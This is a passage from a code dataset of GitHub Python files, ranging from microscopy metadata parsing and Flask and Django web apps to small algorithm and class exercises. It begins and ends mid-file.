line:\n imagingFovUm = line.split('=')[-1].strip()\n p00 = np.fromstring(imagingFovUm[1:-1].split(';')[0], dtype=float, count=2, sep=' ')\n p10 = np.fromstring(imagingFovUm[1:-1].split(';')[1], dtype=float, count=2, sep=' ')\n p01 = np.fromstring(imagingFovUm[1:-1].split(';')[2], dtype=float, count=2, sep=' ')\n p11 = np.fromstring(imagingFovUm[1:-1].split(';')[3], dtype=float, count=2, sep=' ')\n\n metadict[\"nCh\"] = nCh\n metadict[\"fpsscan\"] = fpsscan\n metadict[\"discardFBFrames\"] = discardFBFrames\n metadict[\"nDiscardFBFrames\"] = nDiscardFBFrames\n metadict[\"fpv\"] = fpv\n metadict[\"nVols\"] = nVols\n metadict[\"stackZStepSize\"] = stackZStepSize\n metadict[\"scanVolumeRate\"] = scanVolumeRate\n metadict[\"fovCoords\"] = {'p00':list(p00),'p10':list(p01),\n 'p01':list(p10),'p11':list(p11)}\n metadict[\"xrange_um\"] = p01[0]-p00[0]\n metadict[\"yrange_um\"] = p11[1]-p00[1]\n\n return metadict\n\n\ndef getSIMetadict(metadat):\n matches = [line for line in metadat.split('\\n') if not 'SI.' 
in line]\n m = '\\n'.join(matches[1:-1])\n SImetadict = json.loads(m)\n\n roiGroups = SImetadict['RoiGroups']\n return SImetadict\n\n\n## LOAD AND RESHAPE IMAGE VOLUME ##\n\ndef loadvolume(path2tiff, basicMetadat, selectCaChan):\n vol = io.imread(path2tiff)\n\n # truncate in case acquisition was interrupted and the last volume was incomplete\n trunk = (vol.shape[0])%(basicMetadat['fpv'])\n if trunk > 0:\n vol = vol[:-trunk,:,:]\n\n vol = vol.reshape((int(vol.shape[0]/(basicMetadat['fpv'])),\n basicMetadat['fpv'],basicMetadat['nCh'],vol.shape[-2], vol.shape[-1]))\n # Full dimensional stack: volumes, planes, channels, xpix, ypix\n\n if (selectCaChan):\n # Stack reduced to one color channel and flyback frames discarded\n vol = vol[:,0:basicMetadat['fpv']-basicMetadat['nDiscardFBFrames'],basicMetadat['CaCh'],:,:]\n\n return vol\n","repo_name":"hjmh/fly2p","sub_path":"fly2p/preproc/scanImageUtils.py","file_name":"scanImageUtils.py","file_ext":"py","file_size_in_byte":4383,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"39080304835","text":"# import libraries\nfrom flask import Flask, render_template, request\nfrom flask_restful import Resource, Api\nfrom flask_cors import CORS\nimport os\nimport librosa\nimport numpy as np\nimport librosa.feature\nimport pickle\nfrom models.knn import KNN\n# init flask app object\napp = Flask(__name__)\n\n# init flask-restful Api object\napi = Api(app)\n\n# init cors\nCORS(app)\n\nres = {}\nmodel = pickle.load(open(\"models/model-vokal-a.pkl\", 'rb'))\n\n\n@app.route(\"/\")\ndef landing():\n return render_template(\"/index.html\")\n\n@app.route(\"/data\", methods=[\"GET\", \"POST\"])\ndef coba():\n if request.method == \"GET\":\n return res\n if request.method == 'POST':\n save_path = os.path.join(\"audio/\", \"temp.wav\")\n request.files['audio_data'].save(save_path)\n data = prediction()\n return data\n\ndef prediction():\n global model\n y, sr = librosa.load(\"audio/temp.wav\")\n mfcc = np.array(getMFCC(y))\n new_mfcc = np.array(mfcc)\n X = np.reshape(new_mfcc,(1, new_mfcc.size))\n res = model.predict(X)[0]\n return res[1]\n\ndef getMFCC(f):\n mfcc = librosa.feature.mfcc(y=f, n_mfcc = 13)\n return [np.ndarray.flatten(mfcc)][0]\n\nif __name__ == \"__main__\":\n app.run(debug=True, port = int(os.environ.get('PORT', 5000)))\n","repo_name":"IPRamaAnadya/Tugas-akhir","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42805806731","text":"#!/usr/bin/env python\nimport argparse\nimport copy\n\nfrom flask import Flask\nfrom flask import redirect, render_template, request, session, url_for\nimport yaml\n\nfrom db_connector import connector as conn\nfrom schema_reader import schemareader\nfrom analyse import analyse\n\ndb_conn = None\napp = Flask(__name__)\napp.secret_key = (\n '\\x16T@g\\xcf\\xdcGRzn\\xf5\\xc4\\x068\\xb9\\xf7\\xf7r]\\xf6d\\x96\\x9a\\xdd')\n\n\ndef configRead():\n config_dict = {}\n with open(\"config.yml\", \"r\") as configread:\n try:\n config_dict = yaml.safe_load(configread)\n except yaml.YAMLError as exc:\n print(exc)\n return config_dict\n\n\n@app.route(\"/suggestions\", methods=[\"POST\", \"GET\"])\ndef suggestion_page():\n\tanalysis = analyse.Analyse(db_conn)\n\tprint(\"Starting Analysis.\")\n\tdf = analysis.data_read()\n\tprint(\"Fetched Data.\")\n
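\t# NB: create_model_and_validate is expected to return (recall, precision), in that order\n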
\trecall, precision = analysis.create_model_and_validate(df)\n\tprint(\"Model created and validated.\")\n\treturn render_template(\"suggestions.html\", precision=precision, recall=recall)\n\n@app.route(\"/\", methods=[\"POST\", \"GET\"])\ndef connection_info():\n error = None\n global db_conn\n if request.method == \"POST\":\n config_dict = {}\n config_dict['db.type'] = request.form['connector-type']\n config_dict['db.hostname'] = request.form['hostname']\n # connect to DB\n db_conn = conn.DBConnector(config_dict)\n db_conn.connect()\n print(\"Connection established.\")\n schema_reader = schema_read(db_conn)\n print(\"Schema Read\")\n return redirect(url_for(\".suggestion_page\"))\n return render_template(\"conn-info.html\", error=error)\n\n\ndef schema_read(db_conn):\n # Read schema\n schema_reader = schemareader.SchemaReader(db_conn)\n schema_reader.read()\n return schema_reader\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"ronakmshah/network_analytics","sub_path":"netanalytics.py","file_name":"netanalytics.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1880714481","text":"\n# Async requests\nimport httpx\n\n\n# GETTERS\n\n\n# Fetch the latest ask price for each cryptocoin from Kraken's order-book API\ndef get_orderbook():\n\n # Get cryptocoins in USD\n order_book = httpx.get(\n 'https://api.kraken.com/0/public/Depth?pair=XBTUSD&count=1')\n bitcoin_ask = float(order_book.json()['result']['XXBTZUSD']['asks'][0][0])\n order_book = httpx.get(\n 'https://api.kraken.com/0/public/Depth?pair=XETHZUSD&count=1')\n ethereum_ask = float(order_book.json()['result']['XETHZUSD']['asks'][0][0])\n\n # Convert to BRL\n exchange_usd_brl = httpx.get(\n 'https://economia.awesomeapi.com.br/json/last/USD-BRL')\n usd_brl = float(exchange_usd_brl.json()['USDBRL']['ask'])\n\n return {\n 'Kraken': {\n 'BTC': {\n 'Price(USD)': round(bitcoin_ask, 2),\n 'Price(BRL)': round(bitcoin_ask*usd_brl, 2)\n },\n 'ETH': {\n 'Price(USD)': round(ethereum_ask, 2),\n 'Price(BRL)': round(ethereum_ask*usd_brl, 2)\n }\n }\n }\n","repo_name":"terrotar/ExchangeAPI","sub_path":"app/crud/kraken.py","file_name":"kraken.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74106494828","text":"# Trying to derive a factoring scheme giving a quartic multiplication with two multiplies.\n# (e.g. 
maybe ((x+A)(x+B)+x+C)*(x+D) gives a general quartic.)\nimport sympy as sym\nimport itertools\n\n# a1,b1, a2,b2 = sym.symbols(\"a_1 b_1 a_2 b_2\")\n# x = sym.symbols(\"x\")\n# alpha1,beta1, alpha2,beta2 = sym.symbols(r\"\\alpha_1 \\beta_1 \\alpha_2 \\beta_2\")\n# A,B = sym.symbols(r\"A B\")\n# \n# P = (x**2 + a1*x + b1)*(x**2 + a2*x + b2)\n# P = P.expand()\n# Q = ((x + A)*(x + B) + alpha1*x + beta1) * ((x + A)*(x + B) + alpha2*x + beta2)\n# Q = Q.expand()\n# \n# for i in range(4):\n# # lprint(\"${}$\".format(i), P.coeff(x, i))\n# lprint(\"${}$\".format(i), Q.coeff(x, i))\n# \n# ldone()\n\n# a,b,c,d = sym.symbols(\"a b c d\")\n# x = sym.symbols(\"x\")\n# P = ((x + a)*(x + b) + c)**2 + d\n# P = P.expand()\n# for i in range(4+1):\n# lprint(\"${}$\".format(i), P.coeff(x, i))\n# \n# \n# M = sym.Matrix([[0,0,0,1,0,0,1,0,0,0,2,0,0,1],\n# [0,0,0,0,0,0,0,0,2,2,0,2,2,0],\n# [0,0,2,0,1,1,0,4,0,0,0,0,0,0],\n# [2,2,0,0,0,0,0,0,0,0,0,0,0,0]])\n# \n# lprint(\"\", M * M.transpose())\n# # lprint(\"\", M)\n# # lprint(\"\", M * M.transpose())\n# S = M.transpose() * (M * M.transpose()).inv()\n# lprint(\"\", S)\n# c0,c1,c2,c3 = sym.symbols(\"c_0 c_1 c_2 c_3\")\n# b = sym.Matrix([c0, c1, c2, c3])\n# v = S*b\n# lprint(\"\", v)\n# \n# lprint(\"\", M*v)\n# \n# \n# ldone()\n\na,b,c,d = sym.symbols(\"a b c d\")\nx = sym.symbols(\"x\")\nP = sym.Poly(((x + a)*(x + b) + c + x)**2 + d, x)\nM = []\n\nmonoms = []\nfor na,nb,nc,nd in itertools.product(range(0,2+1), repeat=4):\n monoms.append(a**na * b**nb * c**nc * d**nd)\n \nfor i in range(4+1):\n row = []\n coeff = P.coeff_monomial(x**i)\n p = sym.Poly(coeff, a,b,c,d)\n for na,nb,nc,nd in itertools.product(range(0,2+1), repeat=4):\n monom = a**na * b**nb * c**nc * d**nd\n row.append(p.coeff_monomial(monom))\n M.append(row)\nM = sym.Matrix(M)\n \n# lprint(\"\", M * M.transpose())\n# lprint(\"\", M)\n# lprint(\"\", M * M.transpose())\nS = M.transpose() * (M * M.transpose()).inv()\n# lprint(\"\", S)\nc0,c1,c2,c3,c4 = sym.symbols(\"c_0 c_1 c_2 c_3 c_4\")\nB = sym.Matrix([c0, c1, c2, c3, c4])\nv = S*B\n# lprint(\"\", v)\n# lprint(\"\", M*v)\n\nA = v[monoms.index(a)]\nB = v[monoms.index(b)]\nC = v[monoms.index(c)]\nD = v[monoms.index(d)]\nprint(A)\nprint(B)\nprint(C)\nprint(D)\nprint(P)\nPP = P.subs({a:A, b:B, c:C, d:D}).as_expr().simplify()\nprint(PP)\n\n\n# ldone()\n","repo_name":"LucasPayne/python_math","sub_path":"polynomial_evaluation.py","file_name":"polynomial_evaluation.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24123468964","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 4 08:56:15 2019\n\n@author: ananth\n\"\"\"\n\nimport turicreate as tc\nimport sqlite3 \n\n# Load dataset\nconn = sqlite3.connect(\"msd.sqlite3\")\nlistens = tc.SFrame.from_sql(conn, \"SELECT * FROM train\")\nsongs_df = tc.SFrame.from_sql(conn, \"SELECT * FROM song\")\n\n# Create Training set and test set\ntrain_data, test_data = tc.recommender.util.random_split_by_user(listens, \"userID\", \"songID\")\n\nmodel3 = tc.recommender.factorization_recommender.create(train_data, user_id=\"userID\", item_id=\"songID\", target=\"plays\")\n\nrecc = model3.recommend()\n\nsong_recommendations = recc.join(songs_df, on=\"songID\", how=\"inner\").sort('rank')\n\nprint(song_recommendations)\n\n# Evaluate the model\nrmse_m3 = model3.evaluate_rmse(test_data, target=\"plays\")\n\n# Print the results\nprint(rmse_m3)","repo_name":"antgouri/RecommSys","sub_path":"Music 
Recommeder System/MatrixFactor_RecSys.py","file_name":"MatrixFactor_RecSys.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74509233386","text":"import os\nfrom shutil import copyfile\nimport pickle\nfrom config import Args\nargs = Args()\ndata_dir = args.dir_processed_data_for_datamap\nwith open(os.path.join(data_dir, \"label_dict.pkl\"), \"rb\") as f_in:\n label_dict = pickle.load(f_in)\n\nsplits = [\"train\", \"dev\", \"test\"]\nfor _split in splits:\n with open(os.path.join(data_dir, f\"{_split}.tsv\"), \"r\", encoding='utf-8') as f_in:\n buf = f_in.readlines()\n # rule out empty lines\n buf = [x for x in buf if len(x.strip()) > 0]\n copyfile(os.path.join(data_dir, f\"{_split}.tsv\"), os.path.join(data_dir, f\"{_split}_backup.tsv\"))\n with open(os.path.join(data_dir, f\"{_split}.tsv\"), \"w\", encoding='utf-8') as f_out:\n headers = buf[0].strip().split(\"\\t\")\n # headers = headers[: -1] + [\"human_label\", ] + headers[-1: ]\n headers = headers[: -1] + [\"human_label\", \"label\"]\n headers = '\\t'.join(headers)\n f_out.write(f\"{headers}\\n\")\n for i in range(1, len(buf)):\n fields = buf[i].strip().split(\"\\t\")\n fields = fields + [str(label_dict[fields[-1]]), ]\n content = \"\\t\".join(fields)\n f_out.write(f\"{content}\\n\")\n\n\n","repo_name":"yangalan123/DataMap-Project","sub_path":"data_processor.py","file_name":"data_processor.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"69823381548","text":"import matplotlib.pylab as pylab\nimport sys\n\n\ndef main():\n data = [x.strip() for x in open(sys.argv[1]).readlines()[1:-1]]\n\n fields = [x.split(' ') for x in data]\n\n def get(desired_key, data):\n result = []\n for line in data:\n for field in line:\n if '=' not in field:\n continue\n key, val = field.split('=')\n if key == desired_key:\n result.append(int(val))\n break\n else:\n raise RuntimeError(f\"Key {desired_key} not found\")\n return result\n pylab.plot(get(\"i1\", fields), label='cur1')\n pylab.plot(get(\"i2\", fields), label='cur2')\n pylab.plot(get(\"i3\", fields), label='cur3')\n pylab.legend()\n pylab.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MarioRoldan97/ROBGAM_MOTEUS","sub_path":"utils/plot_cal_phase_currents.py","file_name":"plot_cal_phase_currents.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"23845177796","text":"# This is the longest-substring-of-1s problem (with at most k 0 -> 1 replacements).\n\n\n# Given an array containing 0s and 1s, if you are allowed to replace no more than 'k' 0s with 1s, find the length of the longest contiguous subarray having all 1s.\n\n\n# [ 0 1 1 1 0 1 1 1 0 ] k = 2\n# This is a sliding window problem where we are going to have a start window value and an end window value. We will move through every element of the array and check the number of 0's in the current subarray. We also persist the max number of 1's in the window and check that the number of replaceable 0's in the window is no more than k.\n
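# Worked example: for [0, 1, 1, 1, 0, 1, 1, 1, 0] with k = 2, replacing the 0's at\n# indices 0 and 4 (or 4 and 8) yields a run of eight 1's, so the answer is 8.\n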
We also persist the max number of 1's in the substring and check if the number of 0's in the subtring which can be replaced is no more than the k values \n \n\n# this problem will use a sliding window solution \n# I count the number of ones in a window section and persit it \n# for every window, I make sure I have the same number of replaceale ones which are allowed to be replaced with a 1.\n# If the number of replaceable o's are more than k, then I shrink the string by increasing the start window . \n\n# [ 1 0 1 0 0 0]\nclass Solution:\n def __init__(self,arr,k):\n self.arr = arr \n self.k = k \n\n def get_longest_subtring(self):\n window_start = 0\n max_length = 0 \n max_ones_count = 0 \n for window_end in range(len(arr)):\n if arr[window_end] == 1:\n max_ones_count += 1 \n replaceable_zeros = window_end-window_start +1 - max_ones_count\n\n if replaceable_zeros > k:\n if arr[window_start] == 1:\n max_ones_count -=1 \n window_start += 1 \n\n max_length = max(max_length, window_end-window_start+1)\n\n return max_length\n\n\n\n\nif __name__ == \"__main__\":\n k = int(input())\n arr = list(map(int,input().rstrip().split()))\n solution = Solution(arr,k)\n results = solution.get_longest_subtring()\n print(results)\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# class Solution:\n# def __init__(self,arr, k ):\n# self.arr = arr \n# self.k = k\n\n# def get_longest_subtring(self):\n\n \n# window_start = 0 \n# max_ones_count = 0 \n# max_length = 0 \n# for window_end in range(len(arr)):\n# if arr[window_end] == 1:\n# max_ones_count +=1 \n\n# replaceable_zeros = window_end - window_start+1 - max_ones_count \n# if replaceable_zeros > k:\n# if arr[window_start] == 1 :\n# max_ones_count -=1\n# window_start += 1 \n# max_length = max(max_length,window_end- window_start+1)\n\n# return max_length\n\n\n\n\n# if __name__ == \"__main__\":\n# k = int(input())\n\n# arr = list(map(int,input().rstrip().split()))\n\n# solution = Solution(k,arr)\n# results = solution.get_longest_subtring()\n# print(results)","repo_name":"markowusu/DS-and-Algos-","sub_path":"LongestSubtringAfterOne.py","file_name":"LongestSubtringAfterOne.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"23605555128","text":"\nimport pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer as v\n\nstopwords = [word.strip() for word in open('stopwords').readlines()]\n\ndef keywordExtraction(docs, globalKeywords, minTokens=2, defaultKeywordScore=0, factor=1):\n tfidf = v(use_idf=True, stop_words=stopwords)\n\n dataset = ['%s\\n%s' % (doc['title'], doc['abstract']) for doc in docs]\n tfidf.ngram_range = (2,2)\n model = tfidf.fit_transform(dataset)\n df = pd.DataFrame(model[0].T.todense(), index=tfidf.get_feature_names(), columns=[\"TF-IDF\"])\n keywordsDict = df.to_dict()['TF-IDF']\n\n keywords = list(keywordsDict.items())\n keywords.sort(key = lambda x : -x[1])\n\n return keywords\n","repo_name":"VinGarcia/psychology-keyword-extractor","sub_path":"strategies/tfidf.py","file_name":"tfidf.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2936612108","text":"import logging\n\n\ndef init_logging():\n # logger = logging.root\n # use 'airtest' as root logger name to prevent changing other modules' logger\n logger = logging.getLogger(\"airtest\")\n logger.setLevel(logging.DEBUG)\n handler = logging.StreamHandler()\n formatter = 
logging.Formatter(\n fmt='[%(asctime)s][%(levelname)s]<%(name)s> %(message)s',\n datefmt='%H:%M:%S'\n )\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n\ninit_logging()\n\n\ndef get_logger(name):\n logger = logging.getLogger(name)\n return logger\n","repo_name":"AirtestProject/Airtest","sub_path":"airtest/utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":7514,"dataset":"github-code","pt":"37"} +{"seq_id":"39730698323","text":"file = open(\"arquivo.txt\", mode=\"w\")\n\nfile.write(\"Marcos 10\\n\")\nfile.write(\"Felipe 4\\n\")\nfile.write(\"José 6\\n\")\nfile.write(\"Ana 10\\n\")\nfile.write(\"Maria 9\\n\")\nfile.write(\"Miguel 5\\n\")\n\nfile.close()\n\nrecuStudents = []\nwith open(\"arquivo.txt\") as gradesFile:\n for line in gradesFile:\n student_grade = line\n student_grade = student_grade.split(\" \")\n if int(student_grade[1]) < 6:\n recuStudents.append(student_grade[0] + \"\\n\")\n\n\nwith open(\"recuStudents.txt\", mode=\"w\") as recuStudentsFile:\n print(recuStudents)\n recuStudentsFile.writelines(recuStudents)\n","repo_name":"martin-bachmann/trybe-exercises","sub_path":"ciencia-computacao/secao-1-introducao-a-python/dia-2-entrada-e-saida-de-dados/exeptions.py","file_name":"exeptions.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17780809428","text":"\"\"\"\nCreate a new class `PersonIdentification` with the following attributes:\n\n- `first_name` - the first name of the person\n- `last_name` - the last name of the person\n- `id_number` - the id number if the person [EGN]\n\n> It takes all if them as arguments in the constructor\n\nCreate a new class `BankAccountWallet` with the following attributes:\n\n- `owner: PersonIdentification` - the owner of the wallet - he is of type `PersonIdentification`\n- `balance: float` - the money balance in the wallet\n- `account_identificator` - a number that uniquely identifies the account - can be autoincremented\n using `Class attributes`\n - https://dzone.com/articles/python-class-attributes-vs-instance-attributes\n\nIt defines and implements the following methods too:\n\n- `deposit()` - adds money to the balance\n- `withdraw()` - removes money from the balance if enough\n- `print_balance()` - prints the balance in this format `balance: {balance}`\n\n1. Create a new instance of `BankAccountWallet`\n1. Deposit money to it (1000 dollars)\n1. Print the balance\n1. Withdraw money from it (755.3)\n1. 
Print the balance\n\"\"\"\n\n\nclass PersonIdentification:\n    def __init__(self, first_name: str, last_name: str, id_number: str):\n        self.first_name = first_name\n        self.last_name = last_name\n        self.id_number = id_number\n\n\nclass BankAccountWallet:\n    def __init__(self, owner: PersonIdentification, account_identificator: int):\n        self.owner = owner\n        self.balance = 0.0\n        self.account_identificator = account_identificator\n\n    def deposit(self, amount: float):\n        self.balance = self.balance + amount\n\n    def withdraw(self, amount: float):\n        if self.balance < amount:\n            print(\"Not enough money\")\n        else:\n            self.balance = self.balance - amount  # self.balance -= amount\n\n    def print_balance(self):\n        print(\"balance: \" + str(self.balance))\n\n\nif __name__ == '__main__':\n    owner = PersonIdentification(\"Petar\", \"Atanasov\", \"044123132\")\n    wallet = BankAccountWallet(owner, 1)\n    wallet.deposit(1000.0)\n    wallet.print_balance()\n    wallet.withdraw(755.3)\n    wallet.print_balance()\n\n","repo_name":"genchev99/ia-lectures","sub_path":"lecture_11/solutions/problem_01.py","file_name":"problem_01.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"}
{"seq_id":"34946791501","text":"import sys\r\n\r\n\r\ndef main():\r\n    input_data = sys.stdin.read()\r\n\r\n    # part one\r\n    parser = ProtocolParser(marker_size=4)\r\n\r\n    for char in input_data:\r\n        parser.put_char(char)\r\n\r\n        if parser.marker_detected:\r\n            print(parser.index)\r\n            break\r\n\r\n    # part two\r\n    parser = ProtocolParser(marker_size=14)\r\n\r\n    for char in input_data:\r\n        parser.put_char(char)\r\n\r\n        if parser.marker_detected:\r\n            print(parser.index)\r\n            break\r\n\r\n\r\nclass ProtocolParser:\r\n    def __init__(self, marker_size: int):\r\n        self.index = 0\r\n        self.marker_detected = False\r\n        self.marker_buffer = ''\r\n        self.marker_size = marker_size\r\n\r\n    def put_char(self, char: str):\r\n        assert len(char) == 1\r\n\r\n        self.index += 1\r\n\r\n        if len(self.marker_buffer) < self.marker_size:\r\n            self.marker_buffer += char\r\n        else:\r\n            self.marker_buffer = self.marker_buffer[1:] + char\r\n\r\n        if len(set(self.marker_buffer)) == self.marker_size:\r\n            self.marker_detected = True\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","repo_name":"mjaun/adventofcode","sub_path":"day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"22322387535","text":"from django.http.response import HttpResponse\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom gestionPedidos.models import articulo\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom gestionPedidos.forms import FormularioContacto\n\n# Create your views here.\n\n\ndef busqueda_productos(request): #here we define a function that renders a product search page\n\n    return render(request, \"busqueda_productos.html\")\n\ndef buscar(request): #this function is created to return the search results, with the message stored in the mensaje variable, from busqueda_productos.html\n\n    if request.GET[\"prd\"]:\n\n\n        #mensaje=\"Artículo buscado: %r\" %request.GET[\"prd\"]\n        producto=request.GET[\"prd\"]\n        if len(producto)>20:\n\n            mensaje=\"Texto de búsqueda demasiado largo\"\n\n        else:\n\n            articulos=articulo.objects.filter(nombre__icontains=producto)\n\n            return render(request, \"resultados_busquedas.html\", {\"articulos\":articulos, 
\"query\":producto})\n\n    else:\n        mensaje=\"No has introducido un búsqueda válida. Favor de intentar nuevamente\"\n\n    return HttpResponse(mensaje)\n\n## in the following lines of code, a function is created to send automatic emails\n# check settings.py and views.py for more help on how these parameters are created.\ndef contacto(request):\n\n    if request.method==\"POST\":\n\n        miFormulario=FormularioContacto(request.POST)\n\n        if miFormulario.is_valid():\n\n            infForm=miFormulario.cleaned_data\n\n            send_mail(infForm['asunto'], infForm['mensaje'], infForm.get('email',''),['tomas.prueba.stuardo@gmail.com'],)\n\n            return render(request, \"gracias.html\")\n    \n    else:\n\n        #This form can be built with a form API or created directly\n\n        miFormulario=FormularioContacto()\n\n    return render(request, \"formulario_contacto.html\", {\"form\":miFormulario})\n\n\n    #subject=request.POST[\"asunto\"]\n\n    #mensajes=request.POST[\"mensaje\"] + \" \" + request.POST[\"email\"]\n\n   # email_from=settings.EMAIL_HOST_USER\n\n    #recibiendo_list=[\"tomas.prueba.stuardo@gmail.com\"]\n\n    #send_mail(subject, mensajes, email_from, recibiendo_list)\n\n    #return render (request, \"gracias.html\")\n\n    #else:\n    #    mensaje=\"No ha sido posible enviar su mensaje\"\n\n        #return render (request, \"contacto.html\")","repo_name":"Tom45Stv4rd0/TiendaOnline_Python_Django","sub_path":"gestionPedidos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"27078006252","text":"''' This file contains global variables used in image processing package\r\n'''\r\nimport numpy as np\r\n\r\ndef initialise():\r\n    global A        # image pixel intensity matrix\r\n    global rows     # number of rows in image intensity matrix\r\n    global columns  # number of columns in image intensity matrix\r\n    global maxGray  # maximum intensity possible in image = 2**N -1, N: number of bits used\r\n    global hist     # 1-D histogram of the intensity matrix\r\n    global bitList  # list of matrices of bits after bit slicing \r\n    global A87      # image intensity matrix after combining bits 7 and 8\r\n    global A876\r\n    \r\n\r\n    A=[]\r\n    rows=0\r\n    columns=0\r\n    maxGray=0\r\n    hist=[]\r\n    bitList=[]\r\n    A87=[]\r\n    A876=[]\r\n","repo_name":"Sujata018/Image-Processing","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"33038704716","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nFunctions used in other modules.\n\"\"\"\nfrom django.core.paginator import Paginator, Page, EmptyPage, PageNotAnInteger\nfrom django.core.mail.message import EmailMessage\nfrom django.core.files.storage import default_storage\nfrom django.core.files.base import ContentFile\nfrom django.template.loader import render_to_string, get_template\nfrom django.template.defaultfilters import filesizeformat\nfrom django.template.defaultfilters import slugify\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.auth import views as auth_views\nfrom django.contrib.sites.models import Site\nfrom django.utils.encoding import force_unicode\nfrom django.utils.timezone import utc\nfrom django.conf import settings\n\nfrom apps.backend import AppMessage\nfrom apps.backend.html2text import html2text\n\nfrom datetime import datetime\nfrom time import strptime, strftime\nfrom PIL import 
Image\n\nimport xhtml2pdf\nimport xhtml2pdf.pisa as pisa\nimport cStringIO as StringIO\nimport random, string, re, os, sys\n\n\"\"\"\nCreating a unique slug depending on the model.\nslugify_unique\n\"\"\"\n\nLATIN_MAP = {\n    u'À': 'A', u'Á': 'A', u'Â': 'A', u'Ã': 'A', u'Ä': 'A', u'Å': 'A', u'Æ': 'AE', u'Ç':'C', \n    u'È': 'E', u'É': 'E', u'Ê': 'E', u'Ë': 'E', u'Ì': 'I', u'Í': 'I', u'Î': 'I',\n    u'Ï': 'I', u'Ð': 'D', u'Ñ': 'N', u'Ò': 'O', u'Ó': 'O', u'Ô': 'O', u'Õ': 'O', u'Ö':'O', \n    u'Ő': 'O', u'Ø': 'O', u'Ù': 'U', u'Ú': 'U', u'Û': 'U', u'Ü': 'U', u'Ű': 'U',\n    u'Ý': 'Y', u'Þ': 'TH', u'ß': 'ss', u'à':'a', u'á':'a', u'â': 'a', u'ã': 'a', u'ä':'a', \n    u'å': 'a', u'æ': 'ae', u'ç': 'c', u'è': 'e', u'é': 'e', u'ê': 'e', u'ë': 'e',\n    u'ì': 'i', u'í': 'i', u'î': 'i', u'ï': 'i', u'ð': 'd', u'ñ': 'n', u'ò': 'o', u'ó':'o', \n    u'ô': 'o', u'õ': 'o', u'ö': 'o', u'ő': 'o', u'ø': 'o', u'ù': 'u', u'ú': 'u',\n    u'û': 'u', u'ü': 'u', u'ű': 'u', u'ý': 'y', u'þ': 'th', u'ÿ': 'y'\n}\nLATIN_SYMBOLS_MAP = {\n    u'©':'(c)'\n}\nGREEK_MAP = {\n    u'α':'a', u'β':'b', u'γ':'g', u'δ':'d', u'ε':'e', u'ζ':'z', u'η':'h', u'θ':'8',\n    u'ι':'i', u'κ':'k', u'λ':'l', u'μ':'m', u'ν':'n', u'ξ':'3', u'ο':'o', u'π':'p',\n    u'ρ':'r', u'σ':'s', u'τ':'t', u'υ':'y', u'φ':'f', u'χ':'x', u'ψ':'ps', u'ω':'w',\n    u'ά':'a', u'έ':'e', u'ί':'i', u'ό':'o', u'ύ':'y', u'ή':'h', u'ώ':'w', u'ς':'s',\n    u'ϊ':'i', u'ΰ':'y', u'ϋ':'y', u'ΐ':'i',\n    u'Α':'A', u'Β':'B', u'Γ':'G', u'Δ':'D', u'Ε':'E', u'Ζ':'Z', u'Η':'H', u'Θ':'8',\n    u'Ι':'I', u'Κ':'K', u'Λ':'L', u'Μ':'M', u'Ν':'N', u'Ξ':'3', u'Ο':'O', u'Π':'P',\n    u'Ρ':'R', u'Σ':'S', u'Τ':'T', u'Υ':'Y', u'Φ':'F', u'Χ':'X', u'Ψ':'PS', u'Ω':'W',\n    u'Ά':'A', u'Έ':'E', u'Ί':'I', u'Ό':'O', u'Ύ':'Y', u'Ή':'H', u'Ώ':'W', u'Ϊ':'I',\n    u'Ϋ':'Y'\n}\nTURKISH_MAP = {\n    u'ş':'s', u'Ş':'S', u'ı':'i', u'İ':'I', 